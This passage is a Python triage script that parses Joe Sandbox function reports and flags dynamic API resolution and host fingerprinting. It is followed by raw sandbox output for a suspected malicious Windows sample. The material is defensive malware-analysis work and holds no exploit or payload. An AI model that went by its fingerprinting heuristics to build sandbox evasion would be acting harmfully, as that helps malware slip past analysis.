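# "• GetSystemInfo.KERNEL32(?), ref: 00D668F5" / "• GetModuleHandleA.KERNEL32 ref: 00D66944"
API_LINE = re.compile(
    r"^•\s*(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_LINE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
FUZZY_LINE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)\s*$")
BLOCK_END = re.compile(r"^Uniqueness Score:")

# Assumption: analyst-chosen list of APIs treated as host/environment fingerprinting
# when they co-occur in one function. Not taken from the report.
FINGERPRINT_APIS = {"GetSystemInfo", "GlobalMemoryStatus", "GlobalMemoryStatusEx"}


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)      # (func, module, args, ref)
    strings: list = field(default_factory=list)   # tokens of the "String ID" line
    fuzzy_hash: str = ""

    def api_names(self):
        return {func for func, _, _, _ in self.apis}

    def resolved_targets(self):
        # Strings shaped like exported API names; only meaningful next to GetProcAddress.
        return [s for s in self.strings if re.fullmatch(r"[A-Z][A-Za-z0-9]{3,}", s)]

    def flags(self):
        names = self.api_names()
        out = []
        if "GetProcAddress" in names and self.resolved_targets():
            out.append("dynamic-api-resolution")
        if names & FINGERPRINT_APIS or set(self.resolved_targets()) & FINGERPRINT_APIS:
            out.append("host-fingerprint")
        if "NUMBER_OF_PROCESSORS" in self.strings:
            out.append("cpu-count-env-lookup")
        return out


def parse_blocks(text):
    """Split a report excerpt into FunctionBlock objects, one per 'Uniqueness Score' section."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if BLOCK_END.match(line):
            if cur.apis or cur.strings or cur.fuzzy_hash:
                blocks.append(cur)
            cur = FunctionBlock()
            continue
        if m := API_LINE.match(line):
            cur.apis.append((m["func"], m["module"], m["args"] or "", m["ref"].upper()))
        elif m := STRING_LINE.match(line):
            cur.strings = [s for s in m["ids"].split("$") if s]
        elif m := FUZZY_LINE.match(line):
            cur.fuzzy_hash = m["hash"].upper()
    if cur.apis or cur.strings or cur.fuzzy_hash:
        blocks.append(cur)
    return blocks


def triage(text):
    """One summary dict per block: first ref address, API sequence, strings, flags."""
    return [
        {
            "entry": b.apis[0][3] if b.apis else None,
            "apis": [func for func, _, _, _ in b.apis],
            "strings": b.strings,
            "fuzzy_hash": b.fuzzy_hash,
            "flags": b.flags(),
        }
        for b in parse_blocks(text)
    ]


# Excerpt of the two blocks discussed above (the report's own lines, trimmed).
SAMPLE_REPORT = """\
APIs
• GetSystemInfo.KERNEL32(?), ref: 00D668F5
• GetModuleHandleA.KERNEL32 ref: 00D66944
• GetProcAddress.KERNEL32(00000000), ref: 00D6694B
• GlobalMemoryStatus.KERNEL32 ref: 00D6699B
Strings
Similarity
• API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
• String ID: $@$GlobalMemoryStatusEx$kernel32.dll
• Instruction Fuzzy Hash: CC718CB2A083118FD708CF69D89475BBBE5BBC8314F09892DE899C7351D7B4D908CB96
Uniqueness Score: -1.00%
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00D67B4B
• CloseHandle.KERNEL32(00000000), ref: 00D67B5A
• GetLastError.KERNEL32(?,?,?,?), ref: 00D67B64
• CloseHandle.KERNEL32(?), ref: 00D67B95
• String ID: NUMBER_OF_PROCESSORS$TQ
• Instruction Fuzzy Hash: AE126E70904249DFDB10CFA8C884BDEBBF1FF08318F1481A9E459AB291D7759A49CF60
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT):
        print(row["entry"], row["flags"], row["apis"])
```

Feed the whole "Executed Functions" section of a report into triage() and sort by flags to get the handful of functions worth opening in the disassembler first; the fuzzy hash column lets you cross-reference the same block across other reports of related samples.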

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00CAC6D9
                                                                                                                                                                        • SendMessageW.USER32(?,00000443,00000000), ref: 00CAC743
                                                                                                                                                                        • MulDiv.KERNEL32(?,00000000), ref: 00CAC77A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow
                                                                                                                                                                        • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                        • API String ID: 701072176-2319862951
                                                                                                                                                                        • Opcode ID: 0882ee0e0e6f1189fc61a7da768a67f91fd62afe6888581bd54333e15c9fac2f
                                                                                                                                                                        • Instruction ID: fc5d1299972169716131fb6561e5302f60c6f050d1a0281357d65ce5191c1281
                                                                                                                                                                        • Opcode Fuzzy Hash: 0882ee0e0e6f1189fc61a7da768a67f91fd62afe6888581bd54333e15c9fac2f
                                                                                                                                                                        • Instruction Fuzzy Hash: EAD1D171A00705AFEB14CF24CC95BEEB7B5FF89300F108659E156A72D1DB74AA49CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00CCC098
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000), ref: 00CCC198
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00CCC235
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCC25B
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCC2A5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                                                                                                                                        • String ID: p2
                                                                                                                                                                        • API String ID: 352340201-300010787
                                                                                                                                                                        • Opcode ID: fcb0aca55db8e574b3b41d6af9ec09af805d29b30bc26fa0bebaa4ff180af872
                                                                                                                                                                        • Instruction ID: 4a3976062beaf63a10516cf385516b0e5b66db7733b4939c41516cdfe4553195
                                                                                                                                                                        • Opcode Fuzzy Hash: fcb0aca55db8e574b3b41d6af9ec09af805d29b30bc26fa0bebaa4ff180af872
                                                                                                                                                                        • Instruction Fuzzy Hash: 5871CE71A002099FDB10DFA9CD89BAEB7F4FF45324F14826EE829D7281E7759A44CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                        • Opcode ID: 41a5feb1a6228ae6b756a203f80d751b5ea6485dcbcab7604ace50158b6010a7
                                                                                                                                                                        • Instruction ID: 839151a4fad516b58fcd19e359cb29df65fa3d587445fcbb5087f348382a0913
                                                                                                                                                                        • Opcode Fuzzy Hash: 41a5feb1a6228ae6b756a203f80d751b5ea6485dcbcab7604ace50158b6010a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CD23C71E082298FDB65CF28DC407EAB7B5EB86305F1841EAE44DE7240D774AE818F61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,1FC3D414,?,00000000,00000000), ref: 00D10991
                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 00D109AC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                                                        • Opcode ID: c4a66e3fb5fe50fe3f3fe64131ad9530c4a9732379f62d4af7a9b106d3ce9491
                                                                                                                                                                        • Instruction ID: 38484c1963b7c9a526ca1d8799a93a9ec434ba014eafde138c5de4784e74e059
                                                                                                                                                                        • Opcode Fuzzy Hash: c4a66e3fb5fe50fe3f3fe64131ad9530c4a9732379f62d4af7a9b106d3ce9491
                                                                                                                                                                        • Instruction Fuzzy Hash: 9971AE71D01249EFDB10DFA9DD48AEEBBB4FF04314F188169E815AB291DB719E48CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F8C3,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9A9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9D0
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9D7
                                                                                                                                                                        • InitializeSListHead.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9E4
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9F9
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7FA00
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1475849761-0
                                                                                                                                                                        • Opcode ID: 45d5e0c86701470d5b6fd75220ff2ed58511d44ebccfb323cb988308ca6c15a4
                                                                                                                                                                        • Instruction ID: 0a673421e7e477c71889b39db1b4086b3f55819ac7abb7fef88f8fb5dce2f933
                                                                                                                                                                        • Opcode Fuzzy Hash: 45d5e0c86701470d5b6fd75220ff2ed58511d44ebccfb323cb988308ca6c15a4
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F0AF71640A019FE7219F3AAD08B1637A8EF98B12F044439F98AE3260EF71D4488A60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                                                                                                                                        • API String ID: 1385522511-2308371840
                                                                                                                                                                        • Opcode ID: 2454a9aa4d7d11f2d678f066a909f8e902842f6eccf75fa9b1e5ec9e7076e9ed
                                                                                                                                                                        • Instruction ID: 10b5815a0223acbec418abf4becbe2c8b660476e47d8c1f63f5d1665fad39e95
                                                                                                                                                                        • Opcode Fuzzy Hash: 2454a9aa4d7d11f2d678f066a909f8e902842f6eccf75fa9b1e5ec9e7076e9ed
                                                                                                                                                                        • Instruction Fuzzy Hash: A422C271D002489FDB14DFA4CC95BEEBBB1EF49314F248299E005B7391EB746A85CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
• Instruction ID: aaf2ba8c6a842a04d2dee5b2251443d37418ddabae29c13a13f26d8203b1a309
• Opcode Fuzzy Hash: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
• Instruction Fuzzy Hash: 1CB13432E042469FDF158F68C881BEEBBE5EF56700F19816AE905AF241DA35DD01DBB0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ce6fad6d50eb5bf6e605d152d01688c8bfc83d29585ae24fee6e57f353e1bcd
• Instruction ID: 56c3255635d0f503202adc76ea6f0801e2e84143d08e804dff8421eadffd2114
• Opcode Fuzzy Hash: 6ce6fad6d50eb5bf6e605d152d01688c8bfc83d29585ae24fee6e57f353e1bcd
• Instruction Fuzzy Hash: 8F81BE70901218DFDB60DF28CD89BA9F7B5EF45310F1482D9E919AB292DB709E44CF92
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
• API String ID: 0-932585912
• Opcode ID: 98eb2113b5b8cf7cb751a2f99ba49b896ab281d7138f7e2e65e4ed85f0b0eee6
• Instruction ID: 55d19340bad92841dcd849659d326ecfe79da2477bdbfd3242f9ba44742d3135
• Opcode Fuzzy Hash: 98eb2113b5b8cf7cb751a2f99ba49b896ab281d7138f7e2e65e4ed85f0b0eee6
• Instruction Fuzzy Hash: 47420571D006188BDB18CF68CC95BEDB7F1FF85300F14829AE455AB392E774AA45CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 00CFD28C
• FindClose.KERNEL32(00000000), ref: 00CFD3D7
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Find$AllocCloseFileFirstHeap
• String ID: %d.%d.%d.%d
• API String ID: 2507753907-3491811756
• Opcode ID: ec22099285418301b5f0ebafde7aed65dbe0875f5f7fcbc9d10797d3c88d97c8
• Instruction ID: 5207b1e5167305001f5d59a8616b5f7b22cd3abd0b73bba2895f0cab6ec51148
• Opcode Fuzzy Hash: ec22099285418301b5f0ebafde7aed65dbe0875f5f7fcbc9d10797d3c88d97c8
• Instruction Fuzzy Hash: 6361AD70905219DFCB60DF28CC48BADBBB5EF44314F1082D9E919AB291DB329E84CF81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: <> "$ = "$Hide$Show
• API String ID: 0-289022205
• Opcode ID: cba8aeb80f2563e51b3bcc5708327b38d10eaec2774ffd3d31fa8d9a4700f6eb
• Instruction ID: 4885366dee1c4bafab48f0f85d355fa181756b11b98119ad601700dcbeaefa6d
• Opcode Fuzzy Hash: cba8aeb80f2563e51b3bcc5708327b38d10eaec2774ffd3d31fa8d9a4700f6eb
• Instruction Fuzzy Hash: A4F15870D04298DFDB14DF64CC55BADBBB0BF55304F1086D9E4097B292EB71AA84CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersionExW.KERNEL32 ref: 00D799C8
• GetVersionExW.KERNEL32(?), ref: 00D79A13
• IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00D79A27
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Version$FeaturePresentProcessor
• String ID:
• API String ID: 1871528217-0
• Opcode ID: 1a50d8904100fae985c49a40a7e0e16d9922506cf839c48e0922845d216f1535
• Instruction ID: cbcc2f9952aed3ce33315677d8d6f3997c188043535539cb7b0a53ace794e510
• Opcode Fuzzy Hash: 1a50d8904100fae985c49a40a7e0e16d9922506cf839c48e0922845d216f1535
• Instruction Fuzzy Hash: AA611A72B142244FE708CF2ECC955AABBD5DBC9341F04863FE49AD7291E678C509CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,?,1FC3D414,?), ref: 00CB14DC
• FindNextFileW.KERNEL32(000000FF,00000010,?,1FC3D414,?), ref: 00CB1633
• FindClose.KERNEL32(000000FF,?,?,1FC3D414,?), ref: 00CB1692
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 2b3edb98ccd8f535ca664da57a22a2e76e44f246531ab68136e0249b5dd047eb
• Instruction ID: 3e2a4f626061c0d090844f3a75d541142eb7ac85a0ed2b43e93637f37a4c1458
• Opcode Fuzzy Hash: 2b3edb98ccd8f535ca664da57a22a2e76e44f246531ab68136e0249b5dd047eb
• Instruction Fuzzy Hash: 0B818C70D01259DFDB24DF68CD99BEDB7B8EF44300F548299E815A7291DB706E88CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000004), ref: 00BCF02E
• GetWindowLongW.USER32(00000004,000000FC), ref: 00BCF047
• SetWindowLongW.USER32(00000004,000000FC,?), ref: 00BCF059
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
